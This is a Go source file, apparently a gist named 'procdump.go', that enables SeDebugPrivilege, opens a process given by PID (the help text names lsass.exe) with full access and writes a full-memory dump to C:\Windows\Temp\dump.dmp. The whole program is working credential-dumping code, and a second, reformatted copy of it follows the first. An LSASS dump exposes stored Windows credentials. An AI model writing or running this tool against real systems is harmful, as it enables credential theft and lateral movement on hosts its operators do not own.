pwn1sher/procdump.go

## procdump.go
package main

import (
	"flag"
	"fmt"
	"golang.org/x/sys/windows"
	"log"
	"syscall"
)

const (
	PROCESS_CREATE_PROCESS            = 0x0080
	PROCESS_CREATE_THREAD             = 0x0002
	PROCESS_DUP_HANDLE                = 0x0040
	PROCESS_QUERY_INFORMATION         = 0x0400
	PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
	PROCESS_SET_INFORMATION           = 0x0200
	PROCESS_SET_QUOTA                 = 0x0100
	PROCESS_SUSPEND_RESUME            = 0x0800
	PROCESS_TERMINATE                 = 0x0001
	PROCESS_VM_OPERATION              = 0x0008
	PROCESS_VM_READ                   = 0x0010
	PROCESS_VM_WRITE                  = 0x0020
	GENERIC_WRITE                     = 0x40000000
	FILE_SHARE_WRITE                  = 0x00000002
	CREATE_ALWAYS                     = 0x2
	FILE_ATTRIBUTE_NORMAL             = 0x80
	DEBUG_WITH_FULL_MEMORY            = 0x00000002
	PROCESS_ALL_ACCESS                = (PROCESS_CREATE_PROCESS | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_SET_INFORMATION | PROCESS_SET_QUOTA | PROCESS_SUSPEND_RESUME | PROCESS_TERMINATE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)
)

func EnablePrivilege(name string) error {

	// get current process token

	handle := windows.CurrentProcess()
	var token windows.Token
	err := windows.OpenProcessToken(handle, windows.TOKEN_ADJUST_PRIVILEGES|windows.TOKEN_QUERY, &token)
	if err != nil {
		fmt.Println("Failed to obtain current process token\n")
	}

	// lookup debug privilege
	debug := new(windows.LUID)
	err = windows.LookupPrivilegeValue(nil, windows.StringToUTF16Ptr(name), debug)
	if err != nil {
		fmt.Println("Failed to lookup \"%s\"\n", name)
	}

	// adjust token privilege
	privilege := windows.Tokenprivileges{
		PrivilegeCount: 1,
		Privileges: [1]windows.LUIDAndAttributes{{
			Luid:       *debug,
			Attributes: windows.SE_PRIVILEGE_ENABLED,
		}},
	}
	err = windows.AdjustTokenPrivileges(token, false, &privilege, 0, nil, nil)
	if err != nil {
		fmt.Println("Failed to enable %s with current process token\n", name)
	}
	return nil
}

func main() {

	// Enable Debug Privs !
	EnablePrivilege("SeDebugPrivilege")

	pid := flag.Int("pid", 0, "Process ID of lsass.exe")
	flag.Parse()

	dbghelp := windows.NewLazySystemDLL("Dbghelp.dll")
	MiniDumpWriteDump := dbghelp.NewProc("MiniDumpWriteDump")

	var sa windows.SecurityAttributes

	//get handle to process
	pHandle, errOpenProcess := windows.OpenProcess(PROCESS_ALL_ACCESS, false, uint32(*pid))

	if errOpenProcess != nil {
		log.Fatal(fmt.Sprintf("[!] Error calling OpenProcess: %s\n", errOpenProcess.Error()))
	}
	fmt.Println(fmt.Sprintf("[-] Successfully got a handle to process %d", *pid))

	//create dump file

	path := "C:\\Windows\\Temp\\dump.dmp"
	fHandle, errCreateFile := windows.CreateFile(syscall.StringToUTF16Ptr(path), GENERIC_WRITE, FILE_SHARE_WRITE, &sa, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)

	if errCreateFile != nil {
		log.Fatal(fmt.Sprintf("[!] Error calling CreateFile\n"))
	}
	fmt.Println(fmt.Sprintf("[-] Successfully got a handle to file %d", fHandle))

	PID := uintptr(*pid)
	//dump memory with minidumpwritedump
	success, _, _ := MiniDumpWriteDump.Call(uintptr(pHandle), PID, uintptr(fHandle), DEBUG_WITH_FULL_MEMORY, 0, 0, 0)
	//if errMiniDump != nil {
	if success == 0 {
		log.Fatal(fmt.Sprintf("[!] Error calling MiniDumpWriteDump:\n"))
	}

	fmt.Println(fmt.Sprintf("[-] Dump Completed: %s", path))

	//close handle to process
	windows.CloseHandle(pHandle)
}
	package main

	import (
	"flag"
	"fmt"
	"golang.org/x/sys/windows"
	"log"
	"syscall"
	)

	const (
	PROCESS_CREATE_PROCESS = 0x0080
	PROCESS_CREATE_THREAD = 0x0002
	PROCESS_DUP_HANDLE = 0x0040
	PROCESS_QUERY_INFORMATION = 0x0400
	PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
	PROCESS_SET_INFORMATION = 0x0200
	PROCESS_SET_QUOTA = 0x0100
	PROCESS_SUSPEND_RESUME = 0x0800
	PROCESS_TERMINATE = 0x0001
	PROCESS_VM_OPERATION = 0x0008
	PROCESS_VM_READ = 0x0010
	PROCESS_VM_WRITE = 0x0020
	GENERIC_WRITE = 0x40000000
	FILE_SHARE_WRITE = 0x00000002
	CREATE_ALWAYS = 0x2
	FILE_ATTRIBUTE_NORMAL = 0x80
	DEBUG_WITH_FULL_MEMORY = 0x00000002
	PROCESS_ALL_ACCESS = (PROCESS_CREATE_PROCESS \| PROCESS_CREATE_THREAD \| PROCESS_DUP_HANDLE \| PROCESS_QUERY_INFORMATION \| PROCESS_QUERY_LIMITED_INFORMATION \| PROCESS_SET_INFORMATION \| PROCESS_SET_QUOTA \| PROCESS_SUSPEND_RESUME \| PROCESS_TERMINATE \| PROCESS_VM_OPERATION \| PROCESS_VM_WRITE \| PROCESS_VM_READ)
	)

	func EnablePrivilege(name string) error {

	// get current process token

	handle := windows.CurrentProcess()
	var token windows.Token
	err := windows.OpenProcessToken(handle, windows.TOKEN_ADJUST_PRIVILEGES\|windows.TOKEN_QUERY, &token)
	if err != nil {
	fmt.Println("Failed to obtain current process token\n")
	}

	// lookup debug privilege
	debug := new(windows.LUID)
	err = windows.LookupPrivilegeValue(nil, windows.StringToUTF16Ptr(name), debug)
	if err != nil {
	fmt.Println("Failed to lookup \"%s\"\n", name)
	}

	// adjust token privilege
	privilege := windows.Tokenprivileges{
	PrivilegeCount: 1,
	Privileges: [1]windows.LUIDAndAttributes{{
	Luid: *debug,
	Attributes: windows.SE_PRIVILEGE_ENABLED,
	}},
	}
	err = windows.AdjustTokenPrivileges(token, false, &privilege, 0, nil, nil)
	if err != nil {
	fmt.Println("Failed to enable %s with current process token\n", name)
	}
	return nil
	}

	func main() {

	// Enable Debug Privs !
	EnablePrivilege("SeDebugPrivilege")

	pid := flag.Int("pid", 0, "Process ID of lsass.exe")
	flag.Parse()

	dbghelp := windows.NewLazySystemDLL("Dbghelp.dll")
	MiniDumpWriteDump := dbghelp.NewProc("MiniDumpWriteDump")

	var sa windows.SecurityAttributes

	//get handle to process
	pHandle, errOpenProcess := windows.OpenProcess(PROCESS_ALL_ACCESS, false, uint32(*pid))

	if errOpenProcess != nil {
	log.Fatal(fmt.Sprintf("[!] Error calling OpenProcess: %s\n", errOpenProcess.Error()))
	}
	fmt.Println(fmt.Sprintf("[-] Successfully got a handle to process %d", *pid))

	//create dump file

	path := "C:\\Windows\\Temp\\dump.dmp"
	fHandle, errCreateFile := windows.CreateFile(syscall.StringToUTF16Ptr(path), GENERIC_WRITE, FILE_SHARE_WRITE, &sa, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)

	if errCreateFile != nil {
	log.Fatal(fmt.Sprintf("[!] Error calling CreateFile\n"))
	}
	fmt.Println(fmt.Sprintf("[-] Successfully got a handle to file %d", fHandle))

	PID := uintptr(*pid)
	//dump memory with minidumpwritedump
	success, _, _ := MiniDumpWriteDump.Call(uintptr(pHandle), PID, uintptr(fHandle), DEBUG_WITH_FULL_MEMORY, 0, 0, 0)
	//if errMiniDump != nil {
	if success == 0 {
	log.Fatal(fmt.Sprintf("[!] Error calling MiniDumpWriteDump:\n"))
	}

	fmt.Println(fmt.Sprintf("[-] Dump Completed: %s", path))

	//close handle to process
	windows.CloseHandle(pHandle)
	}